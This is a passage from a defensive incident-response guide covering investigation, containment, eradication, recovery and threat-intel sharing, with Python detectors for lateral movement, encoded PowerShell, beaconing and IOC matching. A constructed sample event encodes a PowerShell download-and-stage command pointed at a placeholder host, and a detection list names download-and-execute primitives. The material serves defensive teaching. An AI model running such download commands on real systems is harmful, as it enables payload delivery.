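Keeping internal addresses in a separate bucket matters when the list is shared: external IPs go to the threat-intel check and the blocklist, internal ones go to the lateral-movement scoping in Step 4.3, and mixing the two produces blocklists that cut off your own file server.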

Step 4.3: Lateral Movement & Privilege Escalation Analysis

Windows Active Directory Investigation:

Key Event IDs in Windows Security logs reveal authentication and privilege activity. Event 4624 records successful logons with authentication type and source information. Event 4625 captures failed logon attempts that may indicate password spraying or brute force attacks. Event 4648 indicates logon using explicit credentials through runas or similar tools. Event 4672 shows special privileges assigned, indicating administrative rights. Event 4688 logs process creation when command line logging is enabled. Event 4769 records Kerberos service ticket requests that often indicate lateral movement between systems.

PowerShell Analysis:

```powershell
# Review PowerShell execution history
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
  Where-Object {$_.Id -eq 4104}  # Script Block Logging

# Check for encoded commands (common in attacks)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} |
  Where-Object {$_.Message -match "encodedcommand"}
```

Common lateral movement techniques that attackers employ include PsExec for remote process execution across Windows systems, WMI (Windows Management Instrumentation) for executing commands remotely, RDP (Remote Desktop Protocol) for interactive access to other systems, Pass-the-Hash attacks that reuse captured NTLM hashes without knowing the actual password, Pass-the-Ticket attacks that reuse captured Kerberos tickets, and WinRM (Windows Remote Management) for PowerShell remoting.
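The Event ID review and the PowerShell queries above answer two questions an analyst asks of an exported Security log: did one account fan out across many hosts over the network, and what did that encoded command actually run? The following is an added example (not the page's code) that applies both checks to a constructed list of events already parsed into dictionaries, the shape a SIEM or EDR export gives. Hosts, accounts, times and the script are all constructed; treating only `-e`, `-ec`, `-enc` and `-EncodedCommand` as the encoded-command switch, and a 15-minute window with three distinct hosts as the fan-out threshold, are assumptions to tune for your environment.

```python
"""Lateral-movement fan-out and encoded-command decoding over parsed 4624/4688 events (added example)."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# -EncodedCommand and its common abbreviations (assumption: these four spellings).
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS_TOKENS = ("Invoke-WebRequest", "DownloadString", "Invoke-Expression", "IEX", "Net.WebClient")


def logon_fanout(events, window=timedelta(minutes=15), min_hosts=3):
    """Map (account, source_ip) -> sorted hosts when one source reaches >= min_hosts distinct hosts
    via network (type 3) or RDP (type 10) logons inside `window`."""
    by_key = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") in (3, 10):
            by_key[(e["account"], e["src_ip"])].append(e)
    flagged = {}
    for key, logons in by_key.items():
        logons.sort(key=lambda e: e["time"])
        for i, start in enumerate(logons):             # slide the window over each logon
            hosts = {l["computer"] for l in logons[i:] if l["time"] - start["time"] <= window}
            if len(hosts) >= min_hosts:
                flagged[key] = sorted(hosts)
                break
    return flagged


def decode_encoded_commands(events):
    """For each 4688 with an encoded command, return (computer, decoded script, matched tokens)."""
    findings = []
    for e in events:
        if e["id"] != 4688:
            continue
        m = ENCODED_RE.search(e.get("command_line", ""))
        if not m:
            continue
        try:   # PowerShell encodes the script as base64 over UTF-16LE
            script = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            script = "<undecodable payload>"
        tokens = [t for t in SUSPICIOUS_TOKENS if t.lower() in script.lower()]
        findings.append((e["computer"], script, tokens))
    return findings


def _t(hms, day=6):
    return datetime(2025, 1, day, *map(int, hms.split(":")), tzinfo=timezone.utc)


# Constructed sample: one benign interactive logon, one encoded download command, one
# service account reaching three hosts in four minutes, one unrelated service logon.
SCRIPT = "Invoke-WebRequest -Uri http://update-check.example.com/stage -OutFile C:\\Windows\\Temp\\s.ps1"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 4624, "time": _t("09:02:11"), "computer": "DESKTOP-01", "account": "jdoe", "logon_type": 2, "src_ip": "-"},
    {"id": 4688, "time": _t("18:35:00"), "computer": "DESKTOP-01",
     "command_line": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"},
    {"id": 4624, "time": _t("18:37:12"), "computer": "FILE-SERVER-01", "account": "svc_backup", "logon_type": 3, "src_ip": "10.0.0.15"},
    {"id": 4624, "time": _t("18:38:40"), "computer": "FILE-SERVER-02", "account": "svc_backup", "logon_type": 3, "src_ip": "10.0.0.15"},
    {"id": 4624, "time": _t("18:41:05"), "computer": "DC-01", "account": "svc_backup", "logon_type": 3, "src_ip": "10.0.0.15"},
    {"id": 4624, "time": _t("18:55:00"), "computer": "FILE-SERVER-01", "account": "backupsvc_nightly", "logon_type": 3, "src_ip": "10.0.0.50"},
]

if __name__ == "__main__":
    print("fan-out:", logon_fanout(SAMPLE_EVENTS))
    for computer, script, tokens in decode_encoded_commands(SAMPLE_EVENTS):
        print(f"{computer}: {script!r} tokens={tokens}")
```

Backup and monitoring accounts legitimately touch many hosts, so the fan-out check is a lead, not a verdict; the baseline from Step 1.4 is what tells you whether `svc_backup` reaching a domain controller is new.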

Tools support lateral movement investigation. Use DNS Lookup to identify unusual internal DNS queries that may indicate C2 communication or reconnaissance. If Business Email Compromise is involved, trace the email delivery path using Email Header Analyzer.

Step 4.4: Data Exfiltration Assessment

Detection methods identify potential data theft. Watch for unusually large outbound data transfers that exceed normal business patterns. Investigate off-hours data access or transfers occurring outside normal working times. Look for compression of sensitive files using tools like tar, zip, or rar that stage data for exfiltration. Monitor for use of cloud storage services such as Dropbox or OneDrive from compromised accounts. Detect DNS tunneling through unusually long DNS queries that encode data within DNS traffic. Consider steganography where data may be hidden within image files to evade detection.

Network Analysis:

```bash
# Analyze PCAP for large transfers
tshark -r capture.pcap -q -z conv,tcp

# Look for suspicious DNS queries
tshark -r capture.pcap -Y "dns" -T fields -e dns.qry.name | sort | uniq -c
```
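Two of the patterns called out in this step, beaconing at regular intervals and unusually large outbound transfers, are easier to score from flow records than from raw packets. The following is an added example (not the page's code) over constructed flow records in the reduced shape a Zeek `conn.log` or NetFlow export provides: a connection series counts as a beacon when it repeats often with low jitter (coefficient of variation of the inter-arrival gaps), and a (source, destination) pair is flagged when its outbound volume crosses a threshold. Every address, port and byte count is constructed, and the thresholds are assumptions to tune per environment.

```python
"""Beaconing and bulk-outbound detection over flow records (added example, not the page's code)."""
import statistics
from collections import defaultdict


def detect_beacons(flows, min_conns=6, max_cv=0.2):
    """Return {(src, dst, dport): (count, mean_gap_s, cv)} for series with many, regular connections."""
    series = defaultdict(list)
    for f in flows:
        series[(f["src"], f["dst"], f["dport"])].append(f["ts"])
    beacons = {}
    for key, stamps in series.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean      # jitter relative to the period
        if cv <= max_cv:
            beacons[key] = (len(stamps), round(mean, 1), round(cv, 3))
    return beacons


def large_outbound(flows, threshold_bytes=1 << 30):
    """Return {(src, dst): total_bytes_out} for pairs at or above the threshold (default 1 GiB)."""
    totals = defaultdict(int)
    for f in flows:
        totals[(f["src"], f["dst"])] += f["bytes_out"]
    return {k: v for k, v in totals.items() if v >= threshold_bytes}


def _flows(src, dst, dport, start, gaps, bytes_each):
    """Build one series of flows from a start time and a list of inter-arrival gaps (seconds)."""
    ts, out = start, []
    for gap in [0] + gaps:
        ts += gap
        out.append({"ts": ts, "src": src, "dst": dst, "dport": dport, "bytes_out": bytes_each})
    return out


BASE = 1736188342   # 2025-01-06 18:32:22 UTC, the first C2 contact in the timeline example
SAMPLE_FLOWS = (
    # suspected C2: ten TLS connections, roughly one per minute, little jitter
    _flows("10.0.0.15", "185.220.101.45", 443, BASE, [60, 58, 62, 61, 59, 60, 61, 59, 60], 1024)
    # ordinary browsing to a constructed external host: irregular gaps
    + _flows("10.0.0.15", "198.51.100.80", 443, BASE + 5, [5, 40, 3, 300, 12], 20_000)
    # one bulk upload to a constructed file-sharing host (15 GiB)
    + _flows("10.0.0.15", "203.0.113.10", 443, BASE + 4380, [], 15 * (1 << 30))
)

if __name__ == "__main__":
    for key, stats in detect_beacons(SAMPLE_FLOWS).items():
        print("beacon candidate", key, "count/mean_s/cv =", stats)
    for key, total in large_outbound(SAMPLE_FLOWS).items():
        print("bulk outbound", key, f"{total / (1 << 30):.1f} GiB")
```

Software update checks and monitoring agents also beacon, so the candidate list should be joined against the external-services baseline from Step 1.4 and the reputation checks from Step 4.2 before anyone calls it C2.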

Data classification determines regulatory and notification requirements based on what data types were potentially accessed. Personal health information (PHI) falls under HIPAA regulations. Payment card data triggers PCI-DSS compliance requirements. Personal identifiable information (PII) of EU residents invokes GDPR obligations. Trade secrets and intellectual property may require notification to affected business partners. Credentials including passwords and API keys require immediate rotation.

Regulatory impact depends on the data types involved in the breach. GDPR requires notification within 72 hours for breaches affecting EU citizens' data. HIPAA mandates notification to the Department of Health and Human Services for breaches affecting 500 or more records. PCI-DSS requires notification to the acquiring bank when payment card data is compromised.

Step 4.5: Attribution & Campaign Analysis

Threat Actor Profiling:

| Indicator | Commodity Malware | Advanced Persistent Threat (APT) |
|---|---|---|
| Sophistication | Low (commodity tools) | High (custom malware, zero-days) |
| Persistence | Limited | Extensive (multiple backdoors) |
| Lateral Movement | Opportunistic | Targeted (specific systems) |
| Exfiltration | Automated | Manual, staged |
| Motivation | Financial (ransomware) | Espionage, IP theft |
| Dwell Time | Days | Months to years |

MITRE ATT&CK mapping provides a common framework for describing attacker behavior. Use the MITRE ATT&CK Browser to map observed TTPs to the framework. For example, PowerShell credential dumping maps to T1003.001 (LSASS Memory). Document the complete attack chain across tactics: Initial Access leading to Execution, followed by Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, and Impact.

Threat intelligence correlation contextualizes the incident within the broader threat landscape. Use Threat Intelligence Feed Aggregator to check IOCs against feeds including AlienVault OTX, MISP (Malware Information Sharing Platform), and commercial cyber threat intelligence sources. Search for campaign names or APT groups using similar TTPs to identify potential attribution. Check if IOCs match known ransomware families like Conti, LockBit, or BlackCat to understand the threat actor's typical playbook.

Key Deliverable: Investigation Report

The investigation report should include an executive summary providing a non-technical overview for leadership, a complete timeline of the attack progression, documentation of the attack vector used for initial compromise, scope assessment covering affected systems, accounts, and data, attacker TTPs mapped to the MITRE ATT&CK framework, complete IOC list including IPs, domains, and file hashes, data impact assessment identifying what data was accessed or exfiltrated, attribution to known campaigns or threat actors if identified, and recommendations for both immediate containment and long-term security improvements.


Stage 5: Containment & Eradication (2-6 hours)

According to the SANS incident response methodology, containment must balance stopping attacker activity with preserving evidence and maintaining business operations. This stage removes the threat while minimizing operational disruption.

Step 5.1: Short-Term Containment

Goal: Immediately limit damage while preserving forensic evidence.

Network Containment:

**Isolation Options:**
1. **VLAN Isolation** - Move infected systems to quarantine VLAN (preserves network forensics)
2. **Firewall Rules** - Block C2 IP addresses and domains
3. **DNS Sinkholing** - Redirect malicious domains to internal sinkhole server
4. **Proxy Blocking** - Block malicious URLs at web proxy
5. **Physical Disconnection** - Unplug network cable (last resort, destroys active connections)

Account Containment:

# Windows: Disable compromised user account
Disable-ADAccount -Identity "compromised.user"

# Force password reset for compromised accounts
Set-ADAccountPassword -Identity "compromised.user" -Reset

# Revoke active cloud sessions (Entra ID / Microsoft 365, Microsoft Graph PowerShell).
# The on-premises ActiveDirectory module has no session-revocation cmdlet: Kerberos
# tickets already issued stay valid until they expire (10 hours by default), so disable
# the account and reset the password as above, then revoke cloud refresh tokens:
Revoke-MgUserSignInSession -UserId "compromised.user@example.com"

Cloud Account Containment:

  • AWS: Revoke IAM access keys, attach explicit deny policy
  • Azure: Revoke user refresh tokens, disable user account
  • Google Workspace: Suspend user account, revoke OAuth tokens
  • Office 365: Block user sign-in, revoke active sessions

System Containment:

# Linux: Drop network connectivity while preserving running state.
# -I inserts at the top of the chain so the DROP is evaluated before any existing
# ACCEPT rules (an appended rule would not cut established sessions).
# Run this from the console or out-of-band management: it also drops your own SSH session.
iptables -I INPUT 1 -j DROP
iptables -I OUTPUT 1 -j DROP

# Windows: Disable network adapter (PowerShell)
Disable-NetAdapter -Name "Ethernet0" -Confirm:$false

Decision Matrix:

| Action | Preserves Evidence | Stops Spread | Business Impact |
|---|---|---|---|
| Monitor Only | ✅ Best | ❌ None | ✅ None |
| Firewall Block | ✅ Good | ✅ Partial | ✅ Low |
| VLAN Isolation | ✅ Good | ✅ Good | ⚠️ Medium |
| Account Disable | ✅ Yes | ✅ Good | ⚠️ Medium-High |
| System Shutdown | ❌ Loses memory | ✅ Complete | ❌ High |

Step 5.2: Long-Term Containment & Eradication

Goal: Remove attacker access and prevent reinfection.

Malware Removal:

**Windows Systems:**
1. Boot into Safe Mode with Networking
2. Run EDR remediation scripts (CrowdStrike RTR, SentinelOne Remote Shell)
3. Remove persistence mechanisms:
   - Scheduled Tasks: Task Scheduler (taskschd.msc)
   - Startup Items: msconfig, shell:startup
   - Services: services.msc
   - Registry Run Keys: HKLM/HKCU\Software\Microsoft\Windows\CurrentVersion\Run

**Linux Systems:**
1. Check cron jobs: crontab -l, /etc/cron.*
2. Check init scripts: /etc/init.d/, systemctl list-unit-files
3. Check SSH authorized_keys: ~/.ssh/authorized_keys
4. Check for LD_PRELOAD rootkits: check /etc/ld.so.preload

Backdoor Elimination Checklist:

  • Remove malicious scheduled tasks
  • Delete rogue user accounts (especially admin accounts)
  • Remove unauthorized SSH keys
  • Check for web shells (search for recently modified .php, .asp, .aspx files)
  • Validate all services (disable unknown services)
  • Review firewall rules for attacker-added exceptions
  • Check for DLL hijacking or search order hijacking

Persistence Mechanism Removal:

# Windows: Enumerate scheduled tasks registered in the last 30 days
# ($_.Date is a string and is empty for many built-in tasks, so guard and cast before comparing)
Get-ScheduledTask | Where-Object { $_.Date -and [datetime]$_.Date -gt (Get-Date).AddDays(-30) } |
  Select-Object TaskName, TaskPath, State, Date

# Check registry run keys
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

# Enumerate services created recently. Win32_Service carries no usable InstallDate,
# so use the Service Control Manager "new service installed" event (System log, ID 7045)
Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Service Control Manager'; Id=7045; StartTime=(Get-Date).AddDays(-30)} |
  Select-Object TimeCreated, Message

Step 5.3: Validation & Verification

Goal: Confirm complete removal of attacker presence.

Validation tools confirm complete eradication. Use IP Risk Checker to verify no ongoing C2 communication by examining firewall logs for connections to known malicious infrastructure. Check for rogue SSL certificates that may have been issued using Certificate Transparency Lookup. Verify email infrastructure integrity with Email Authentication Validator to ensure no unauthorized SPF or DKIM changes were made. Confirm DNS records haven't been modified for C2 or phishing purposes using DNS Lookup. Re-scan systems with Hash Generator to verify all malware has been removed.

Re-Scanning Procedures:

1. **Full Antivirus Scan** - Run full disk scan with updated definitions
2. **EDR Scan** - Initiate deep scan from EDR console
3. **IOC Hunt** - Search for extracted IOCs across environment
4. **Memory Analysis** - Capture new memory dump, compare to baseline
5. **Network Monitoring** - Monitor for beaconing or C2 attempts (24-48 hours)

Evidence of Complete Eradication:

  • ✅ No detection of known malware hashes
  • ✅ No communication with identified C2 infrastructure
  • ✅ All persistence mechanisms removed
  • ✅ No unauthorized accounts or elevated privileges
  • ✅ No suspicious scheduled tasks or services
  • ✅ Clean memory analysis (no malicious processes)
  • ✅ No DNS queries to malicious domains

Key Deliverable: Containment Log & Eradication Evidence

Documentation Requirements:

**Containment Actions Taken:**
- 2025-01-07 15:00 - Isolated DESKTOP-01 to quarantine VLAN
- 2025-01-07 15:15 - Disabled user account "john.doe"
- 2025-01-07 15:30 - Blocked C2 IP 185.220.101.45 at firewall
- 2025-01-07 16:00 - Revoked active sessions for compromised account

**Eradication Actions Taken:**
- 2025-01-07 16:30 - Removed malicious scheduled task "Windows Update Check"
- 2025-01-07 16:45 - Deleted malware from C:\Users\john.doe\AppData\Local\Temp\
- 2025-01-07 17:00 - Removed registry persistence key
- 2025-01-07 17:30 - Full system scan with Defender (clean)

**Validation Results:**
- Full AV scan: Clean
- IOC hunt across 500 endpoints: No additional detections
- Network monitoring (48 hours): No C2 communication detected
- Status: ✅ Eradication complete, approved for recovery

Stage 6: Recovery & Restoration (2-8 hours, varies by impact)

The recovery phase transitions from incident response to business continuity, as described in NIST's recovery guidance. The goal is safely restoring operations while preventing reinfection.

Step 6.1: System Restoration Strategy

Decision: Rebuild vs. Restore

| Factor | Rebuild from Clean Image | Restore from Backup |
|---|---|---|
| Confidence in Eradication | Low | High |
| Malware Sophistication | Advanced (APT, rootkit) | Commodity malware |
| Time to Restore | Longer (hours to days) | Faster (minutes to hours) |
| Data Loss Risk | Recent data may be lost | Backup must be pre-infection |
| Recommendation | Ransomware, rootkits, APT | Contained malware, known clean backup |

Clean Rebuild Process:

1. **Verify Clean Image** - Use known-good image from before compromise
2. **Patch Before Connection** - Apply all security updates offline
3. **Credential Rotation** - Reset all passwords before rejoining domain
4. **Restore Data** - Copy user data from backup or forensic image (scan first)
5. **Rejoin Network** - Connect to isolated VLAN for validation
6. **Extended Monitoring** - 48-hour monitoring before production

Credential Rotation:

# Force password reset for all domain users (use cautiously)
Get-ADUser -Filter * | Set-ADUser -ChangePasswordAtLogon $true

# Reset specific service accounts
Set-ADAccountPassword -Identity "svc_backup" -Reset

# Rotate application API keys and database passwords
# (Application-specific procedures)

Certificate Reissuance:

  • If attacker had domain admin access, assume private keys compromised
  • Use Certificate CSR Generator to generate new certificate requests
  • Reissue all SSL/TLS certificates
  • Update certificate revocation lists (CRL)

Patch Vulnerable Systems:

**Critical Patching:**
1. Identify initial attack vector (e.g., unpatched Exchange, VPN appliance)
2. Apply vendor patches immediately
3. Verify patch deployment across all affected systems
4. Conduct vulnerability scan to confirm remediation
5. Review patch management process for systematic improvement

Step 6.2: Enhanced Monitoring & Detection

Goal: Deploy additional monitoring to detect reinfection or attacker return.

IOC-based monitoring deploys indicators across security infrastructure. Export IOCs from the investigation using IOC Extractor. Deploy these IOCs across multiple platforms: create SIEM correlation rules for IOC matches, add IDS/IPS signatures for known malware and C2 traffic, create EDR watchlists for malicious file hashes and registry keys, configure firewall rules to block known C2 IP addresses and domains, and set up DNS monitoring for queries to malicious domains.

SIEM Rule Example:

Alert: "Possible Reinfection - IOC Detected"
Trigger: Network connection to known C2 IP (185.220.101.45)
Severity: Critical
Action: Immediate isolation + alert IR team
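The rule above is easy to state but its implementation details decide whether it fires: indicators shared in defanged form must be refanged before matching, and substring matching on an IP or domain produces false hits on longer values. As an added example (not from the original guide), the following Python implements the rule as a small IOC watchlist matcher over constructed firewall, DNS resolver, EDR, and mail gateway log lines, using this guide's own incident IOCs plus a placeholder hash. The log line formats, the `fw01`/`dns01`/`edr`/`mx01` source names, and the severity mapping are assumptions.

```python
"""Added example: IOC watchlist matching over constructed log lines.

Not part of the original guide; log formats and source names are assumptions.
"""
import re
from dataclasses import dataclass

# Watchlist built from the incident's IOC catalog, stored defanged as it would be
# shared. The SHA-256 entry is a placeholder, not a real sample hash.
WATCHLIST = {
    "ip": {"185.220.101.45": "C2 server", "192.0.2.100": "download server"},
    "domain": {"evil-domain[.]com": "C2 domain", "update-server[.]net": "payload host"},
    "email": {"phishing@fake-invoice[.]com": "phishing sender"},
    "sha256": {"<PLACEHOLDER_SHA256_OF_DROPPER>": "dropper"},
    "task": {"Windows Update Check": "persistence task"},
}

SEVERITY = {"ip": "critical", "domain": "critical", "sha256": "critical",
            "email": "high", "task": "high"}

# Constructed log lines (firewall, DNS resolver, EDR, mail gateway).
SAMPLE_LOGS = [
    "2025-01-10T02:13:44Z fw01 action=allow src=10.0.5.23 dst=185.220.101.45 dport=443",
    "2025-01-10T02:13:45Z dns01 client=10.0.5.23 query=evil-domain.com type=A",
    '2025-01-10T02:14:02Z edr host=DESKTOP-02 event=task_created name="Windows Update Check"',
    "2025-01-10T02:15:10Z fw01 action=allow src=10.0.5.41 dst=203.0.113.7 dport=443",
    '2025-01-10T02:16:30Z mx01 from=phishing@fake-invoice.com subject="Invoice 4471"',
]


def refang(ioc):
    """Undo common defanging so indicators match what appears in raw logs."""
    return ioc.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")


@dataclass(frozen=True)
class Hit:
    line_no: int
    ioc_type: str
    value: str        # the watchlist entry as stored (defanged)
    description: str
    severity: str


def build_patterns(watchlist):
    """Compile one regex per IOC, anchored so that neighbouring characters that could
    extend the value (digits, letters, dots, hyphens) prevent a match. That keeps
    '185.220.101.45' from matching inside '1185.220.101.45' or '185.220.101.450'."""
    compiled = []
    for ioc_type, entries in watchlist.items():
        for raw, description in entries.items():
            value = refang(raw)
            pattern = re.compile(r"(?<![\w.-])" + re.escape(value) + r"(?![\w.-])", re.IGNORECASE)
            compiled.append((ioc_type, raw, description, pattern))
    return compiled


def match_iocs(lines, watchlist=WATCHLIST):
    """Return one Hit per (line, IOC) pair, in line order."""
    patterns = build_patterns(watchlist)
    hits = []
    for n, line in enumerate(lines, 1):
        for ioc_type, raw, description, pattern in patterns:
            if pattern.search(line):
                hits.append(Hit(n, ioc_type, raw, description, SEVERITY[ioc_type]))
    return hits


def alert_summary(hits):
    """Render hits in the alert shape used in the rule above."""
    return [f"Possible Reinfection - IOC Detected [{h.severity}] line {h.line_no}: "
            f"{h.ioc_type} {h.value} ({h.description})" for h in hits]


if __name__ == "__main__":
    for alert in alert_summary(match_iocs(SAMPLE_LOGS)):
        print(alert)
```

The watchlist is kept defanged on purpose: it can be copied straight from the IOC catalog or a sharing platform, and the refang step is the only place the live form appears. In a real deployment the same matcher output would drive the isolation playbook rather than a print statement.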

Threat intelligence integration maintains awareness of evolving threats. Subscribe to threat feeds using Threat Intelligence Feed Aggregator to receive updates on new IOCs and campaigns. Integrate these feeds into SIEM platforms for continuous monitoring against the latest threat indicators. Update IDS/IPS signatures based on emerging campaigns that may target your industry. Participate in ISACs (Information Sharing and Analysis Centers) such as Financial Services ISAC or Health-ISAC to share and receive threat intelligence from peer organizations.

Behavioral Monitoring:

**Anomaly Detection Rules:**
- New scheduled tasks on critical systems
- Service creation outside change windows
- Unusual outbound data transfers
- Off-hours access to sensitive data
- Privilege escalation events
- PowerShell execution with encoded commands
- Lateral movement patterns (multiple failed logins followed by success)

Step 6.3: Service Validation & Testing

Pre-Production Validation:

Email Security Validation:

  • Email Authentication Validator - Verify SPF, DKIM, DMARC intact
    • Confirm no unauthorized changes to DNS records
    • Test email delivery to major providers (Gmail, Outlook)
    • Verify DMARC policy not weakened (should be p=reject or p=quarantine)
  • DNS Lookup - Confirm all DNS records match baseline
    • Check for attacker-added MX records (email interception)
    • Verify no DNS tunneling subdomains created

Functional Testing:

**Business-Critical Services:**
1. **Authentication** - Test user logins, SSO, MFA
2. **Email** - Send/receive test messages
3. **File Shares** - Access permissions intact
4. **Databases** - Application connectivity, query performance
5. **VPN** - Remote access functionality
6. **Cloud Services** - AWS/Azure/GCP access and permissions
7. **Payment Processing** - PCI-compliant transaction flow

Performance Testing:

  • Baseline metrics: Response time, throughput, error rate
  • Compare to pre-incident baselines
  • Identify any degradation requiring optimization

Security Validation:

**Final Security Checks:**
- [ ] Full vulnerability scan (Nessus, Qualys, OpenVAS)
- [ ] Penetration test of initial attack vector
- [ ] Review user account permissions (least privilege)
- [ ] Verify backup integrity and restoration capability
- [ ] Test disaster recovery procedures
- [ ] Validate security tool functionality (EDR, SIEM, IDS/IPS)

Key Deliverable: Recovery Timeline & Validation Report

Recovery Documentation:

**Recovery Timeline:**
- 2025-01-07 18:00 - Clean Windows image deployed to DESKTOP-01
- 2025-01-07 18:30 - All Windows updates applied
- 2025-01-07 19:00 - User data restored from pre-infection backup (2025-01-05)
- 2025-01-07 19:30 - Credentials rotated for affected user
- 2025-01-07 20:00 - System rejoined domain
- 2025-01-07 20:30 - IOC monitoring rules deployed to SIEM
- 2025-01-07 21:00 - 48-hour monitoring period begins

**Validation Test Results:**
- Authentication: ✅ Passed
- Email delivery: ✅ Passed (SPF/DKIM/DMARC verified)
- File share access: ✅ Passed
- Vulnerability scan: ✅ No critical findings
- EDR scan: ✅ Clean
- Network monitoring (48h): ✅ No IOC detections

**Sign-Off:**
- Lead Investigator: John Doe (2025-01-09 21:00)
- IT Operations: Jane Smith (2025-01-09 21:15)
- Incident Commander: Bob Johnson (2025-01-09 21:30)
- Status: ✅ System restored to production

Stage 7: Post-Incident Activity & Lessons Learned (1-2 weeks)

According to SANS post-incident review guidance, the lessons learned phase is often neglected but provides the highest ROI for improving security posture. This stage transforms incident experience into organizational resilience.

Step 7.1: Comprehensive Incident Documentation

Final Incident Report Components:

1. Executive Summary (1-2 pages)

**Incident Overview:**
- Incident Type: Ransomware attack via phishing email
- Detection Date: 2025-01-07 03:47:00 UTC
- Resolution Date: 2025-01-09 21:30:00 UTC
- Total Duration: 66 hours from detection to full recovery
- Severity: P2 (High) - Single endpoint, no data exfiltration

**Impact Assessment:**
- Systems Affected: 1 workstation (DESKTOP-01)
- Users Affected: 1 (Finance Department)
- Data Impact: No data loss (restored from backup)
- Downtime: 2 business hours for affected user
- Financial Impact: $15,000 (IR team labor, forensics, lost productivity)

**Response Effectiveness:**
- Detection: Automated (EDR alert)
- Response Time: 15 minutes to containment
- Eradication: Complete within 24 hours
- Recovery: Full restoration within 66 hours
- Reinfection: None detected (30-day follow-up)

2. Detailed Timeline (Complete attack progression)

  • See Stage 4.1 for timeline format
  • Include all attacker actions, IR team actions, and business impact events

3. Root Cause Analysis

**Initial Attack Vector:** Phishing email bypassed email security gateway

**Contributing Factors:**
- User clicked malicious attachment (insufficient security awareness)
- Endpoint antivirus did not detect initial payload (0-day malware)
- EDR detected suspicious behavior but 15-minute delay in alert (tuning needed)
- No MFA on compromised account (enabled single credential compromise)

**Root Cause:** Lack of email attachment sandboxing + insufficient user training

4. IOC Catalog (Complete indicator list)

  • File Hashes: (MD5, SHA-1, SHA-256 of malware samples)
  • IP Addresses: 185.220.101.45 (C2 server), 192.0.2.100 (download server)
  • Domain Names: evil-domain[.]com, update-server[.]net
  • Email Addresses: phishing@fake-invoice[.]com
  • Registry Keys: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
  • Scheduled Tasks: "Windows Update Check" (persistence)
  • Mutexes: Global\Malware_Mutex_v2

Use IOC Extractor and URL Defanger to compile and safely share IOCs.

5. Financial Impact Assessment

**Direct Costs:**
- IR Team Labor (40 hours × $150/hr): $6,000
- Forensic Analysis (20 hours × $200/hr): $4,000
- System Rebuild (8 hours IT time): $800
- Total Direct: $10,800

**Indirect Costs:**
- Lost Productivity (1 user × 2 days): $2,000
- Management Time (meetings, reporting): $1,500
- Reputation Impact: Not quantifiable

**Total Incident Cost: $14,300**

**Cost Avoidance:** Data breach avoided (estimated $500K if ransomware spread)

6. Compliance Notifications (If applicable)

  • GDPR breach notification (if EU data affected)
  • HIPAA breach reporting (if PHI accessed)
  • PCI-DSS incident reporting (if payment card data compromised)
  • SEC cybersecurity disclosure (if material impact to publicly traded company)

Step 7.2: Threat Intelligence Sharing

Goal: Contribute to community defense by sharing IOCs and TTPs.

Intelligence Sharing Platforms:

  • Threat Intelligence Feed Aggregator - Export IOCs in STIX/TAXII format
  • MISP (Malware Information Sharing Platform) - Share with trusted communities
  • AlienVault OTX - Public threat intelligence platform
  • VirusTotal - Upload malware samples (if not already present)
  • ISACs - Information Sharing and Analysis Centers (FS-ISAC, Health-ISAC, etc.)

STIX 2.1 Format Example (the id must be "indicator--" followed by a UUID, and "modified" is required alongside "created"; the UUID below is a placeholder):

{
  "type": "indicator",
  "spec_version": "2.1",
  "id": "indicator--00000000-0000-4000-8000-000000000001",
  "created": "2025-01-09T10:00:00.000Z",
  "modified": "2025-01-09T10:00:00.000Z",
  "indicator_types": ["malicious-activity"],
  "pattern": "[ipv4-addr:value = '185.220.101.45']",
  "pattern_type": "stix",
  "valid_from": "2025-01-06T18:32:00.000Z",
  "labels": ["c2-server"]
}

Sharing Guidelines:

  • Sanitize PII - Remove customer names, employee information
  • Defang IOCs - Use URL Defanger to prevent accidental clicks
  • Classify Sensitivity - TLP (Traffic Light Protocol) classification
    • TLP:RED - Do not share (internal only)
    • TLP:AMBER - Limited sharing (trusted partners)
    • TLP:GREEN - Community sharing (ISACs)
    • TLP:WHITE - Public sharing (unrestricted)
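Producing the STIX object by hand, as in the example above, is where malformed identifiers and missing required properties creep in. The following added Python example (not the guide's own code; standard library only) ties the STIX example and the sharing guidelines together: it turns an IOC list into a STIX 2.1 bundle with proper UUID identifiers, the required "modified" property, an "indicator_types" vocabulary entry and a TLP marking reference, checks each object against the properties a consumer will reject it without, and renders a defanged plain-text list for channels that are not STIX-aware. The IOC values are this guide's incident examples with a placeholder hash; the TLP marking-definition identifiers are the fixed ones defined in the STIX 2.1 specification.

```python
"""Added example: build a STIX 2.1 indicator bundle and a defanged share list.

Not part of the original guide. Uses only the standard library; the sample
IOCs are this guide's incident examples and the hash is a placeholder.
"""
import json
import re
import uuid
from datetime import datetime, timezone

# Fixed TLP marking-definition ids from the STIX 2.1 specification (section 7.2.1.4).
TLP_MARKINGS = {
    "white": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
    "green": "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
    "amber": "marking-definition--f88d31f6-486f-44da-b317-01333bde0b82",
    "red": "marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed",
}

# STIX pattern template per IOC type.
PATTERNS = {
    "ipv4": "[ipv4-addr:value = '{v}']",
    "domain": "[domain-name:value = '{v}']",
    "email": "[email-addr:value = '{v}']",
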